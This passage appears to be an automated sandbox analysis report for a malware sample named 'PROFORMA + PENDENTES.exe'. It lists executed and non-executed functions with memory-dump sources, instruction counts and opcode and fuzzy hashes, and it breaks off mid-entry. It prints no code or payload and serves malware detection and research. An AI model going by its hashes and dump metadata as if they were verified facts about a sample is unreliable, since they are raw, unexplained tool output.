Instruction ID: a8ecc46f252c5b96faeb9e01451d1bac66cd62d399f9f06c8be252e45ca259a5
Opcode Fuzzy Hash: b11c620c7baeb146a988b2c09458b452cf01dd41d126342eb3878346135993ed
Instruction Fuzzy Hash: 1D11E2B58003499FDB10DF9AC885BDEFBF8EB49320F10841AE558A7600C3B9A944CFA5

Function 00B1D1FC Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1483349580.0000000000B1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b1d000_PROFORMA + PENDENTES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c95f2d30b6d9b138beafb29cb5ea1cd76a84a0315a1815525fdc1d477283ce7c
Instruction ID: 9488801c35f0bf0ef234ccc86dc28160eb77082616c58c161e48342e7ecf5ddf
Opcode Fuzzy Hash: c95f2d30b6d9b138beafb29cb5ea1cd76a84a0315a1815525fdc1d477283ce7c
Instruction Fuzzy Hash: 9E2103B2504344DFDB15DF50D8C0B66BBA5FB88310F60C6A9E8190B256C33AD896CBA2

Function 00B2D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1483390175.0000000000B2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B2D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b2d000_PROFORMA + PENDENTES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a398d5db9934b9a2eade56c967e0396e8acb2488149ee64ff1ae6ceb54ac52c
Instruction ID: 882e2136b0a02aa7ac93a639818de1d76969dae5384ae86cd8c1f31a84baeea0
Opcode Fuzzy Hash: 1a398d5db9934b9a2eade56c967e0396e8acb2488149ee64ff1ae6ceb54ac52c
Instruction Fuzzy Hash: 4D21D071604344DFDB14DF10E9D4B17BBA5FB88314F20C5A9D84E4B2A6C33AD847CA62

Function 00B2D1EC Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1483390175.0000000000B2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B2D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b2d000_PROFORMA + PENDENTES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6ca772ab06d6ba1bff82bd026fd0d0ca0d8f168e1a76bcc7d3ecfd77d456046
Instruction ID: ccae7a65204ce587c352fd9f68c608c32ec2aadd88349b0e902ac3b70704eafc
Opcode Fuzzy Hash: a6ca772ab06d6ba1bff82bd026fd0d0ca0d8f168e1a76bcc7d3ecfd77d456046
Instruction Fuzzy Hash: 9E2104B1604344EFDB04DF50E9C0B16BBA5FB98314F20C6ADD80D4B296C33AD846CAA2

Function 00B2D006 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1483390175.0000000000B2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B2D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b2d000_PROFORMA + PENDENTES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9232d76c02d9b246c69571c102c7fecc6112cb5ab87225d528af64ff640ca29d
Instruction ID: 61d12ec145a8a9b2bfa0ccfdebd4b39fb1800f53fb012bc1c64d8289ca8dfe8e
Opcode Fuzzy Hash: 9232d76c02d9b246c69571c102c7fecc6112cb5ab87225d528af64ff640ca29d
Instruction Fuzzy Hash: 812162755083809FCB12CF14D994B16BFB1EB46314F28C5DAD8498F2A7C33A985ACB62

Function 00B1D1F7 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1483349580.0000000000B1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b1d000_PROFORMA + PENDENTES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 788e04879303f038a4119c50adcc9150c8354023de2962495192c323b19cba65
Instruction ID: 5f1ef90e38b00a2b8d133bc807d86b5ff877be82cfbacbd142c13dfd7fcfd449
Opcode Fuzzy Hash: 788e04879303f038a4119c50adcc9150c8354023de2962495192c323b19cba65
Instruction Fuzzy Hash: 2021B176504240DFCB16CF50D9C4B56BFB2FB84314F24C6A9DC494B656C33AD86ACBA1

Function 00B2D1E7 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1483390175.0000000000B2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B2D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b2d000_PROFORMA + PENDENTES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd2c54e641c636489e18f71c5e932094e1140b5f592d34fffac0146327057262
Instruction ID: 9688cd2ef5ccdb5c93cd8f6ee85cf6abdc3a7e219e511400a7232bf92e545c8c
Opcode Fuzzy Hash: dd2c54e641c636489e18f71c5e932094e1140b5f592d34fffac0146327057262
Instruction Fuzzy Hash: 31118B75504284DFCB05CF50E5C4B15BBA2FB84314F24C6A9D84D4B656C33AD84ACBA1

Function 00B1D759 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1483349580.0000000000B1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b1d000_PROFORMA + PENDENTES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7914367857341ce1816bd741e249ec04aca57ebb93f0d5741f1bcf490293812c
Instruction ID: ccfdfbb8b83a43616230825e01accaba96c5e6f0bd7ad1e40e00d32c2f7519ae
Opcode Fuzzy Hash: 7914367857341ce1816bd741e249ec04aca57ebb93f0d5741f1bcf490293812c
Instruction Fuzzy Hash: 1E01DB711043449FE7104B15DDC4BA7FBE8EF81720F58C59AED094A2C6C3799C80CAB5

Function 00B1D758 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1483349580.0000000000B1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b1d000_PROFORMA + PENDENTES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98c7f944b51cf6abe1a491d92c769dce636d60d9d8df8cddafa24de0149b2453
Instruction ID: e39892da023f25d32ba1d51c39840d7f727dae1c5d70b400f25b2437a14bf397
Opcode Fuzzy Hash: 98c7f944b51cf6abe1a491d92c769dce636d60d9d8df8cddafa24de0149b2453
Instruction Fuzzy Hash: 6EF096714043449FE7208A16DD84BA6FFE8EF91734F18C55AED085B2C6C379AC44CAB5

Non-executed Functions

Function 06E4B4E0 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1492885721.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e40000_PROFORMA + PENDENTES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76c8fcc55ddf23b62a08e9ad42ae1ef0ad537b9ba953e93de78e1f91c5594310
Instruction ID: 96582cd630ffb70160b3870719deab6ac69c7710f0ee2236b95894822f4959fa
Opcode Fuzzy Hash: 76c8fcc55ddf23b62a08e9ad42ae1ef0ad537b9ba953e93de78e1f91c5594310
Instruction Fuzzy Hash: D0E1F774E102598FDB18DFA9D580AAEFBB2FF89305F248169D414AB355D730AD42CFA0

Function 06E4C2C8 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1492885721.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e40000_PROFORMA + PENDENTES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32ca61a5021ba3f2cbe670d643f4cc1ce89380e7eaaf5fba2df234ed34c7f240
Instruction ID: 27a797d16e808650f65ac7a70252b7d0fc83f6dfa6fa6879882079dd31fc614b
Opcode Fuzzy Hash: 32ca61a5021ba3f2cbe670d643f4cc1ce89380e7eaaf5fba2df234ed34c7f240
Instruction Fuzzy Hash: C8E10874E102598FDB18DFA8D580AAEFBB2FF89305F24C169D414AB355D730A942CFA0

Function 06E4A240 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1492885721.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e40000_PROFORMA + PENDENTES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86960d09a8cf6f42a71a1b3cd03f059dd8729e18a8dd6600e7b12bdcd79bc42e
Instruction ID: 93986d3e67ba6832c1b53e28f1da1f1ea9a7965d0239f1b2bf1c2963989d8b03
Opcode Fuzzy Hash: 86960d09a8cf6f42a71a1b3cd03f059dd8729e18a8dd6600e7b12bdcd79bc42e
Instruction Fuzzy Hash: F8E11974E102598FDB14DFA8D580AAEFBB2FF89314F24C169D414AB359D734A942CFA0

Function 06E49E08 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1492885721.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e40000_PROFORMA + PENDENTES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5388de31bd74e4cbbc0fc573651494961147335192924697044b4988037bd620
Instruction ID: d714455f14721eec8608eec61cc2c085e9c8d6892a48d0af0545860bcc19c53e
Opcode Fuzzy Hash: 5388de31bd74e4cbbc0fc573651494961147335192924697044b4988037bd620
Instruction Fuzzy Hash: BAE11874E102598FDB14DFA8D580AAEFBB2FF89304F248169D414AB359D731AD42CFA0

Function 06E4BDB8 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1492885721.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e40000_PROFORMA + PENDENTES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f6d2427ec39f222965e894f18c1cfd2a7a079786524276dbf9984759da5d816
Instruction ID: 13b1b9a99347bb58b868c035b55e9118ea745810a975a24046c99bc6d3e3f042
Opcode Fuzzy Hash: 9f6d2427ec39f222965e894f18c1cfd2a7a079786524276dbf9984759da5d816
Instruction Fuzzy Hash: 02E10974E102598FDB18DFA9D9809AEFBB2FF89304F248169D414AB355D731A942CFA0

Function 06E416E7 Relevance: .3, Instructions: 270COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1492885721.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e40000_PROFORMA + PENDENTES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d93e7034fef9160284e59b8eb581d2eb80d9840bdca39ecf74a8dc4dfa9f9988
Instruction ID: 46f9270de55cac725d1e280c698fcbffa9f0469d5ff593726f98e3308be7ae6a
Opcode Fuzzy Hash: d93e7034fef9160284e59b8eb581d2eb80d9840bdca39ecf74a8dc4dfa9f9988
Instruction Fuzzy Hash: 17D1E43192065A8ACB15EB64D890BDDF7B1FF96300F50CB9AE50A37210EF706AC5CB91

Function 06E416F8 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1492885721.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e40000_PROFORMA + PENDENTES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6da40ac2117f309b92f9dfc7306b16b4a72f05710b3f1009f4b588bb78c94e39
Instruction ID: da9d58b61282f232220cc01ec35c7e26609dbe9a5319b4ea306a95b5a9b3d91d
Opcode Fuzzy Hash: 6da40ac2117f309b92f9dfc7306b16b4a72f05710b3f1009f4b588bb78c94e39
Instruction Fuzzy Hash: F4D1E431D2065A8ACB15EB64D990ADDF7B1FF96300F50CB9AE50A37210EF706AC5CB91

Function 06E49DDA Relevance: .2, Instructions: 152COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1492885721.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e40000_PROFORMA + PENDENTES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 055ef2ee15ee5bd21e55d124af59d72e470ff2a61ba97f1b6bc6f45cab0170e6
Instruction ID: ab3f125401df60dd3161a19b97313e0faa44d658f9351e2b364661bafe8d2135
Opcode Fuzzy Hash: 055ef2ee15ee5bd21e55d124af59d72e470ff2a61ba97f1b6bc6f45cab0170e6
Instruction Fuzzy Hash: 39516D70E102198FDB18DFA9D5805AEFBF2BF89304F24C16AD418B7256C7319A42CFA1

Function 06E4BDA8 Relevance: .1, Instructions: 136COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1492885721.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e40000_PROFORMA + PENDENTES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a2cca188708db003181ad71e9e52bea436d29a2207382032f1708d12782a466
Instruction ID: c19cb9744fab67dc4a557d0dae2c86423d1c11640285e11a17986b964f8ab0fe
Opcode Fuzzy Hash: 5a2cca188708db003181ad71e9e52bea436d29a2207382032f1708d12782a466
Instruction Fuzzy Hash: BA511B74E102198FDB18DFA9D9805AEBBF2AF89304F24C16AD418AB355D7319942CFA1

Function 06E4A232 Relevance: .1, Instructions: 135COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1492885721.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e40000_PROFORMA + PENDENTES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40f0821499f832e651ddc48cd3ea40dd0db6c0e1769f8ae61c6bb68731f58c2d
Instruction ID: 69f650f160b0a1ef9781455559372db981657e5ac7c2ab87c899a0257e3fb0f1
Opcode Fuzzy Hash: 40f0821499f832e651ddc48cd3ea40dd0db6c0e1769f8ae61c6bb68731f58c2d
Instruction Fuzzy Hash: F0511A70E102198FDB18DFA9C9805AEFBF2BF89314F24C16AD418AB355D7309942CFA0

Function 07080007 Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1493042073.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7080000_PROFORMA + PENDENTES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb766ca5cb73f8bd284aad1bc20f0b0c20cf37036939b8274c376436116c1b84
Instruction ID: b8ec87baf95c2ea3de00ce8f3e6d32d92d2971104aeb00bfb763611f084203f7
Opcode Fuzzy Hash: cb766ca5cb73f8bd284aad1bc20f0b0c20cf37036939b8274c376436116c1b84
Instruction Fuzzy Hash: 2C313EB1D0A3948FEB59CF67C8043D9BFB76F86210F08C1EBC449AA266D6350989CF51

Analysis Process: PROFORMA + PENDENTES.exePID: 3636, Parent PID: 7924COMMON

Executed Functions

Function 00FF97E8 Relevance: .9, Instructions: 899COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1628121773.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ff0000_PROFORMA + PENDENTES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 893257787643f68763723f0040ca78bb8362ed5b0de14fb1b435631900ed7b27
Instruction ID: a3df7bfbc2aac6035a3b53e0c1313f8f0558cdad7fbe0a230e833ecf45f75593
Opcode Fuzzy Hash: 893257787643f68763723f0040ca78bb8362ed5b0de14fb1b435631900ed7b27
Instruction Fuzzy Hash: 0E828E71A04209CFCB15CF68C884AAEBBF2FF88310F258559E9199B2B1D774ED81DB51

Function 00FF6108 Relevance: .5, Instructions: 513COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1628121773.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ff0000_PROFORMA + PENDENTES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ba728a93c36d61316d3fe694400d75bcaa18bccf9f2e19580eb32f78b036a40
Instruction ID: 2231a58ae9a9c893749e0375a1947880e3770a0b1f927abd8bf88de4a974b577
Opcode Fuzzy Hash: 4ba728a93c36d61316d3fe694400d75bcaa18bccf9f2e19580eb32f78b036a40
Instruction Fuzzy Hash: 45128F71A002189FDB14DFA9C854BAEBBB6FF88314F248529E505EB3A1DF349D81DB50

Function 00FF6730 Relevance: .4, Instructions: 441COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1628121773.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ff0000_PROFORMA + PENDENTES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2eaecfada330979bf10b00e91ff33b46278e684fa7c6638cbf403b16f81dc748
Instruction ID: a035a9f072cc41a0333fc850340a22a96267dc3c8cc4f9929a3cce3c6c8be814
Opcode Fuzzy Hash: 2eaecfada330979bf10b00e91ff33b46278e684fa7c6638cbf403b16f81dc748
Instruction Fuzzy Hash: 0C022A71A002199FCB14CFA9C984ABDBBB2EF88315F158069EA45EB271DB34DD41EB50

Function 00FFB328 Relevance: .4, Instructions: 357COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1628121773.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ff0000_PROFORMA + PENDENTES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9fa1f62a12b669472d54d7b58a8b6ecc96f9c0de42c3ab9cf3b13c67417581ef
Instruction ID: 82c408467b18b3146d1f110ddcc6fe99ce6a8b302f88dc7dbc4cc5707a4fd74d
Opcode Fuzzy Hash: 9fa1f62a12b669472d54d7b58a8b6ecc96f9c0de42c3ab9cf3b13c67417581ef
Instruction Fuzzy Hash: 7BE1FA75E00658CFDB14DFA9C984AADBBB1FF49310F1580A9E919AB362D730AC41DF50

Function 00FFBEB0 Relevance: .2, Instructions: 207COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1628121773.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ff0000_PROFORMA + PENDENTES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31041ea6fb9b38cf69b33947300ac8a3ca8d6f4f0518ccee6ea70607d86377f4
Instruction ID: 762929e2b52d52426edd1624b083a4a5d847ddd80a6b4cb3608d4d3b91491637
Opcode Fuzzy Hash: 31041ea6fb9b38cf69b33947300ac8a3ca8d6f4f0518ccee6ea70607d86377f4
Instruction Fuzzy Hash: B491F775E0021CCFDB14DFA9D984AADBBF2BF89310F248069E509AB365DB349942DF50

Function 00FFBBD3 Relevance: .2, Instructions: 206COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1628121773.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ff0000_PROFORMA + PENDENTES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e6af5e550566f1fa16543825994925d4eef73a37150de6b440a6a42ccd583b2
Instruction ID: 94f2dcb46e6d77627d18f46715f381d64892258b2c939dabce0c611dac9996ed
Opcode Fuzzy Hash: 3e6af5e550566f1fa16543825994925d4eef73a37150de6b440a6a42ccd583b2
Instruction Fuzzy Hash: 4E91D274E00258CFDB18DFA9C884AADBBF2BF89310F2480A9D559AB365DB349D41DF11

Function 00FFC470 Relevance: .2, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1628121773.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ff0000_PROFORMA + PENDENTES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4821a92edcb85ee2bbcb58c70b4325790607b99016c8686301123c1768e07cbc
Instruction ID: 51ec9fef4e68a4ea308560c01583aa1bb4b1a791a5f40171e900568ea2f2567c
Opcode Fuzzy Hash: 4821a92edcb85ee2bbcb58c70b4325790607b99016c8686301123c1768e07cbc
Instruction Fuzzy Hash: 3C91F375E0021CCFDB14DFA9D984AADBBF2BF89310F248069E919AB365DB309941DF50

Function 00FFC190 Relevance: .2, Instructions: 197COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1628121773.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ff0000_PROFORMA + PENDENTES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5f639fce9c6a299cf60b6e4b4f30cdd5e1d8cfa6eef8bd45f989c7b687c14af
Instruction ID: 963ac3d37a47c9834bfe9823acd234fe6a51e286f2d3e9332d330cabfe0ed961
Opcode Fuzzy Hash: b5f639fce9c6a299cf60b6e4b4f30cdd5e1d8cfa6eef8bd45f989c7b687c14af
Instruction Fuzzy Hash: BB91D375E0021C8FDB14DFAAD984AADBBF2BF88310F248069E509AB365DB349945DF50

Function 00FFC751 Relevance: .2, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1628121773.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ff0000_PROFORMA + PENDENTES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22ce154ea212ebd5a874d9adbde85f78b1dc72f310cef54ccb75468db1be9173
Instruction ID: 66788db8375a00b076ac572285d3dd314e2b8cfea7eb1a0183fa0d60417f6899
Opcode Fuzzy Hash: 22ce154ea212ebd5a874d9adbde85f78b1dc72f310cef54ccb75468db1be9173
Instruction Fuzzy Hash: 52810574E0021CCFDB18DFA9D984AADBBF2BF89310F248069E509AB365DB709941DF50

Function 00FF4AD9 Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1628121773.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ff0000_PROFORMA + PENDENTES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 537a42d4b97db1142604820858224fb01794efff9190006b59f1a9282ff74fe2
Instruction ID: 5a04b05b83399b59fccb90ace4d57d041fd1308bae324cba5c71fc0930d29421
Opcode Fuzzy Hash: 537a42d4b97db1142604820858224fb01794efff9190006b59f1a9282ff74fe2
Instruction Fuzzy Hash: 3681D674E00258CFDB18DFA9D884AAEBBF2BF89310F14C069D919AB365DB749941DF10

Function 00FFCA31 Relevance: .2, Instructions: 185COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1628121773.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ff0000_PROFORMA + PENDENTES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5493a8b323df67a06949f2144e5e670504f03a75288d6cc2952cf75d6874dcfd
Instruction ID: 479cc02e0c082b5fba81f561adfc00805c8c532872e9075e6336a81e65c3be30
Opcode Fuzzy Hash: 5493a8b323df67a06949f2144e5e670504f03a75288d6cc2952cf75d6874dcfd
Instruction Fuzzy Hash: 7381D574E0025CCFDB18DFA9D994AADBBF2BF88310F148069E509AB365DB349941DF50

Function 00FFB4F3 Relevance: .2, Instructions: 154COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1628121773.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ff0000_PROFORMA + PENDENTES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28a43b86160241a0ed66baaec7a31034b0cfc39ba293a2c0e32d9eae301dd7e3
Instruction ID: 2eaf6fb7dd16cf447b2bd7bdc8c90d2969e9dcfba7562605dbf7736cb8ec8ab5
Opcode Fuzzy Hash: 28a43b86160241a0ed66baaec7a31034b0cfc39ba293a2c0e32d9eae301dd7e3
Instruction Fuzzy Hash: 7961F775E00248CFDB18DFAAD984AADBBF2BF89310F14C069E918AB365DB345941DF00

Function 00FF77F0 Relevance: .7, Instructions: 702COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1628121773.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ff0000_PROFORMA + PENDENTES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77fa6c659d82f919a30aa58813aab789f546b68b5c67c9b91614099304284e2c
Instruction ID: 824c0ebd7491df27ce42b0d66c51fdc3031b1b071fd157b1889819d65dce50a3
Opcode Fuzzy Hash: 77fa6c659d82f919a30aa58813aab789f546b68b5c67c9b91614099304284e2c
Instruction Fuzzy Hash: 7F522F74A0021C8FEB149BA4CC60BAEBB72FF89300F5084A9D50A6B365DF395E85DF55

Function 00FF87E9 Relevance: .5, Instructions: 503COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1628121773.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ff0000_PROFORMA + PENDENTES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0d4f1e9979b4326d7a807da7a99722f95e1148d17176c18a140c2d07eee0114
Instruction ID: 10c0f7ee5295a92bc61bc4295b6a014928b5502db2311e586774fce28128402e
Opcode Fuzzy Hash: e0d4f1e9979b4326d7a807da7a99722f95e1148d17176c18a140c2d07eee0114
Instruction Fuzzy Hash: C6F180717042098FDB259A29C854B397796EFD5B90F1440AAE702CF3B1EF68CC82E751

Function 00FF6E58 Relevance: .5, Instructions: 475COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1628121773.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ff0000_PROFORMA + PENDENTES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d4d9a19a60ca716c9faddeb3859e9b818f83405f5f244f301cf9fe24f0b4f33
Instruction ID: 2f460b52184d2be153ddadfab713296953c4621a0f79838e0281686dc0c68322
Opcode Fuzzy Hash: 7d4d9a19a60ca716c9faddeb3859e9b818f83405f5f244f301cf9fe24f0b4f33
Instruction Fuzzy Hash: 03124B30A042499FCB25DFA8D884AAEBBF2FF88714F158599E905DB271DB30ED41DB50

Function 00FFA818 Relevance: .4, Instructions: 413COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1628121773.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ff0000_PROFORMA + PENDENTES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f4977df1c0da2fd31986a846b73199a5f015a9a4aa4d33bad0d472b8cfc3af9
Instruction ID: 7b0a41e0f5b7525cdee5e7794c3c3c318dba5543aed3161c2d6645c4d1d00b55
Opcode Fuzzy Hash: 3f4977df1c0da2fd31986a846b73199a5f015a9a4aa4d33bad0d472b8cfc3af9
Instruction Fuzzy Hash: 2EF1FCB5A002198FCB14CFA9C9849ADB7F6FF88320B1A8059E619AB371C735EC41DB51

Function 00FF0C8F Relevance: .4, Instructions: 406COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1628121773.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ff0000_PROFORMA + PENDENTES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c7d6f348368d185ffc5bff7facf434eecd02c8884c591da510535f268e76213
Instruction ID: 1b8e0772e769f10aed4e4a290c7849a80f350193a8d6dcb59e513f95b5b9e7cb
